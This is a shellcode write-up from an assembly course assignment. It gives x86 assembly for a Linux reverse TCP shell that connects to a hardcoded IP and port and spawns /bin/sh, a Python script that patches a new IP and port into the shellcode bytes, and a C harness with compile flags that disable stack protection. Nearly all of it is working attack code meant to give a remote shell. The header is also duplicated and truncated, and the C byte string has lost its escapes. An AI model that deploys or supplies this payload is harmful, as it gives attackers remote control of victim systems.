; Author: Stylianos Voukatas
; Website: https://vostdev.wordpress.com/
; Date: 2020-12-30
; Tested on: Linux ubuntu 5. ; Title: Linux/x86 - Reverse TCP Shellcode ( 114 bytes )
; Author: Stylianos Voukatas
; Website: https://vostdev.wordpress.com/
; Date: 2020-12-30
; Tested on: Linux ubuntu 5.4.0-42-generic #46~18.04.1-Ubuntu x86_64
;
; Purpose: Assignment 2 for SLAE
; SLAE: http://securitytube-training.com/onlinecourses/securitytube-linux-assembly-expert/
; Student ID: PA-27669
;
; Shellcode-length: 114
;-------------------------------------- ASM --------------------------------------
global _start
section .text
_start:
; set registers to zero
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
;socket section
mov ax, 0x167 ; set num for socket interrupt
mov bl, 0x02 ; set domain IPv4 Protocol, try also 0x00 for both v4 and v6, also one less instruction
mov cl, 0x01 ; set type
; edx is zero ; set protocol, leave it 0 so it will select on its own based on the type
int 0x80 ; interrupt for socket()
; eax will hold our file descriptor (fd)
mov esi, eax ; store fd
; connect section
; construct the struct sockaddr_in
; prepare eax for ip addr XOR, set a mask
mov eax, 0xffffffff
push edx ; padding 4 bytes
push edx ; padding 4 bytes
; address 192.168.1.12 is in little endian 0xc01a8c0
; we XOR the address using a mask of 0xffffffff and we get 0xf3fe573f
; in order to restore the initial value we need to XOR again with the mask
; this is done to avoid null characters in case our ip addr contain 0
xor eax, 0xf3fe573f
push eax ; address field, set to 192.168.1.12, in little endian format
; same convertion for the port number
mov eax, 0xffffffff
xor ax, 0xc6fa ; port number 1337 after mask applied in little endian
push ax
push word 0x02 ; address family
mov ecx, esp ; save the struct address in stack
mov dl, 0x10 ; size of struct, 16 bytes (padding + address + port + family)
mov ebx, esi ; set fd
xor eax, eax
mov ax, 0x016a ; set num for bind interrupt
int 0x80
; check if connect succeed
test eax, eax ; if not zero then an error occured
jnz exit
; dup2 section
xor ecx, ecx
mov cl, 0x3 ; prepare for loop
xor eax, eax
dup_loop:
; ebx has the fd from the previous call
; duplicate fd for stdin, stdout, stderr
mov al, 0x3f
dec cl
int 0x80
jnz dup_loop
; execve section
xor eax, eax
push eax ; push � in stack
; /bin//sh
push 0x68732f2f
push 0x6e69622f
mov ebx, esp
push eax ; push 0 in stack
mov edx, esp
push ebp ; push the address of /bin//sh in stack
mov ecx, esp ; put the address of args in ecx
mov al, 0xb
int 0x80
exit:
xor eax, eax
xor ebx, ebx
mov al, 0x01
mov bl, 0x07 ; just a random number as an exit code :)
int 0x80
;-------------------------------------- ASM --------------------------------------
Script to automaticaly produce the shellcode, set ip and port
;-------------------------------------- Python -----------------------------------
#!/usr/bin/python
from operator import xor
# set ip and port
ip = "192.168.1.12"
#port = "31337"
#ip = '127.0.0.1'
port = '8888'
ip_in_xored_bytes = ''
port_in_xored_bytes = ''
shell_code_1 = "\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc6\xb8\xff\xff\xff\xff\x52\x52\x35"
#ip
shell_code_2 = "\x50\xb8\xff\xff\xff\xff\x66\x35"
#port
shell_code_3 = "\x66\x50\x66\x6a\x02\x89\xe1\xb2\x10\x89\xf3\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x27\x31\xc9\xb1\x03\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\x75\xf8\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x55\x89\xe1\xb0\x0b\xcd\x80\x31\xc0\x31\xdb\xb0\x01\xb3\x07\xcd\x80"
for byte in ip.split("."):
ip_in_xored_bytes += "\x" + "{:x}".format(xor(int(byte),0xff))
port_in_xored_bytes += "{:04x}".format(xor(int(port),0xffff))
port_xored_formated = "\x" + port_in_xored_bytes[:2] + "\x" + port_in_xored_bytes[2:]
print "ip:", ip
print "xored ip: ", ip_in_xored_bytes
print "port:", port
print "xored port: ", port_xored_formated
print ""
shell_code = shell_code_1 + ip_in_xored_bytes + shell_code_2 + port_xored_formated + shell_code_3
print "ShellCode:"
print shell_code
;-------------------------------------- Python ------------------------------------
C program to test the payload
gcc shellcode.c -o shellcode -fno-stack-protector -z execstack -m32
;-------------------------------------- Paylod test -------------------------------
#include<stdio.h>
#include<string.h>
unsigned char code[] =
"x31xc0x31xdbx31xc9x31xd2x66xb8x67x01xb3x02xb1x01xcdx80x89xc6xb8xffxffxffxffx52x52x35x3fx57xfexf3x50xb8xffxffxffxffx66x35xddx47x66x50x66x6ax02x89xe1xb2x10x89xf3x31xc0x66xb8x6ax01xcdx80x85xc0x75x27x31xc9xb1x03x31xc0xb0x3fxfexc9xcdx80x75xf8x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x89xe2x55x89xe1xb0x0bxcdx80x31xc0x31xdbxb0x01xb3x07xcdx80";
main()
{
printf("Shellcode Length: %d ", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}